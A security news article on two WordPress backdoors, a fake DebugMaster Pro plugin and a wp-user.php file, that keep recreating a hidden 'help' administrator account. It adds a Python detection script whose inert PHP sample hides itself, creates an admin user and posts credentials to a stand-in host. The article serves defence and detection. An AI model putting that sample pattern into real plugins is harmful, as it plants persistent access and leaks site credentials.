Hidden Backdoors in WordPress: How Attackers Use Fake Plugins and Core Files for Persistent Access


Security researcher Puja Srivastava from Sucuri uncovered two malicious files designed to guarantee persistent attacker access by manipulating administrator accounts in a compromised WordPress website. The case highlights how threat actors disguise backdoors as legitimate WordPress components, making detection and remediation far more difficult.

The first backdoor was found at ./wp-content/plugins/DebugMaster/DebugMaster.php, masquerading as a plugin called DebugMaster Pro.

“This ‘DebugMaster Pro’ plugin disguised itself as a legitimate developer tool, but its hidden functions created an administrator user with hardcoded credentials. It also included code to hide itself from plugin listings and could send stolen information to a remote server,” Srivastava explained.

The plugin silently created a new administrator account named help and made sure it kept administrator privileges. It then exfiltrated the account's credentials (username, password, email address and server IP) to a command-and-control server; the endpoint was stored in obfuscated form in the code and decoded at runtime to hxxps://kickstar-xbloom[.]info/collect[.]php.

Additionally, it injected external scripts into the website that executed for all visitors except administrators or whitelisted IPs. These scripts were designed to log administrator IP addresses and potentially deliver further malicious payloads.
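A static triage pass over the plugins directory, given here as an added example (it is not Sucuri's tooling and not code from the article), looks for the combination of behaviours described above in a single PHP file: creating users, hiding the plugin from the Plugins screen, contacting a remote host, and carrying obfuscated strings. The two sample plugin files it scans are constructed for the demo, the all_plugins hook is assumed to be how the hiding is done, and the indicator names and scoring rule are my own choices rather than details from the write-up.

```python
"""Static triage of a WordPress plugins directory for backdoor indicators.

Added example, not Sucuri's tooling. Each PHP file is checked for the
behaviours the article attributes to the fake DebugMaster plugin: creating
users, hiding from the plugin list, contacting a remote host, and string
obfuscation. Sample files, indicator names and the scoring rule are
constructed assumptions for the demo.
"""
import os
import re
import tempfile

# One regex per behaviour. A hit names a behaviour, not a specific malware family.
INDICATORS = {
    "creates_user": re.compile(r"\b(wp_insert_user|wp_create_user)\s*\("),
    "grants_admin": re.compile(r"set_role\s*\(\s*['\"]administrator['\"]"),
    # all_plugins is the filter applied before the Plugins screen renders (assumed hook)
    "hides_plugin": re.compile(r"add_filter\s*\(\s*['\"]all_plugins['\"]"),
    "remote_call": re.compile(r"\b(wp_remote_post|wp_remote_get|curl_init|fsockopen)\s*\("),
    # decoder calls, or runs of \xNN escapes that hide a string such as a C2 URL
    "obfuscation": re.compile(r"\b(base64_decode|gzinflate|str_rot13|eval)\s*\(|(\\x[0-9a-fA-F]{2}){4,}"),
}
STEALTH = {"hides_plugin", "remote_call", "obfuscation"}

# Constructed sample files: one inert stand-in for the fake plugin, one benign plugin.
SAMPLE_FILES = {
    "DebugMaster/DebugMaster.php": r"""<?php
/*
Plugin Name: DebugMaster Pro
*/
add_filter('all_plugins', function ($plugins) {
    unset($plugins[plugin_basename(__FILE__)]);
    return $plugins;
});
$uid = wp_insert_user(['user_login' => 'help', 'user_pass' => 'x', 'role' => 'administrator']);
$c2 = "\x68\x74\x74\x70\x73\x3a\x2f\x2f" . 'example.invalid/collect.php';
wp_remote_post($c2, ['body' => ['u' => 'help', 'ip' => $_SERVER['SERVER_ADDR']]]);
""",
    "hello-world/hello.php": r"""<?php
/*
Plugin Name: Hello World
*/
add_action('admin_notices', function () { echo '<p>Hello</p>'; });
""",
}


def scan_file(path):
    """Return the set of indicator names whose regex matches the file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    return {name for name, rx in INDICATORS.items() if rx.search(src)}


def is_suspicious(hits):
    """Flag account manipulation combined with any stealth or exfil behaviour.
    Either half alone occurs in legitimate plugins; the combination rarely does."""
    return bool(hits & {"creates_user", "grants_admin"}) and bool(hits & STEALTH)


def scan_plugins(plugins_dir):
    """Walk a plugins directory; return {relative_path: sorted hits} for flagged files."""
    findings = {}
    for root, _dirs, files in os.walk(plugins_dir):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(root, name)
            hits = scan_file(path)
            if is_suspicious(hits):
                rel = os.path.relpath(path, plugins_dir).replace(os.sep, "/")
                findings[rel] = sorted(hits)
    return findings


def build_sample_tree():
    """Write the constructed sample plugins into a temp dir and return its path."""
    base = tempfile.mkdtemp(prefix="wp-plugins-")
    for rel, body in SAMPLE_FILES.items():
        full = os.path.join(base, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return base


def demo():
    """Scan the sample tree; only the DebugMaster stand-in should be flagged."""
    return scan_plugins(build_sample_tree())


if __name__ == "__main__":
    for rel, hits in demo().items():
        print(f"SUSPICIOUS {rel}: {', '.join(hits)}")
```

On a live site point scan_plugins() at wp-content/plugins (and run scan_file() over stray PHP files in the document root, which is where the second backdoor in this case sat). Treat hits as triage leads: a legitimate membership plugin will create users, and a backup plugin will call wp_remote_post, but a file that does both and also filters all_plugins deserves a manual read.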

The second malicious file was discovered at the root of the site as ./wp-user.php. While simpler, it was no less dangerous.

Srivastava noted, “The goal of this file is to maintain a specific administrator account… It checks the existing WordPress users and if it found the username help, it deleted that user and recreated it with the attacker’s chosen password. Otherwise, it simply created a fresh help administrator account.”

This meant that even if site owners deleted the rogue admin user or changed its credentials, the script would simply recreate the account on the next execution, ensuring attackers always retained access.

Sucuri recommends website administrators look for these red flags:

  • Unknown files such as ./wp-content/plugins/DebugMaster/DebugMaster.php or ./wp-user.php.
  • Hidden administrator accounts not visible in the standard user list.
  • Reappearing administrator users even after deletion.

The combination of DebugMaster Pro and wp-user.php created a resilient persistence mechanism. As Srivastava explained, “Both files create or re-create administrator-level accounts. The design of both files ensures that even if you try to clean up, the malicious users or code can reappear, making full recovery very difficult without expert help.”

By exfiltrating credentials, hiding plugin listings, and regenerating administrator users, attackers could maintain long-term control over compromised websites, inject spam, redirect visitors, or steal sensitive information.
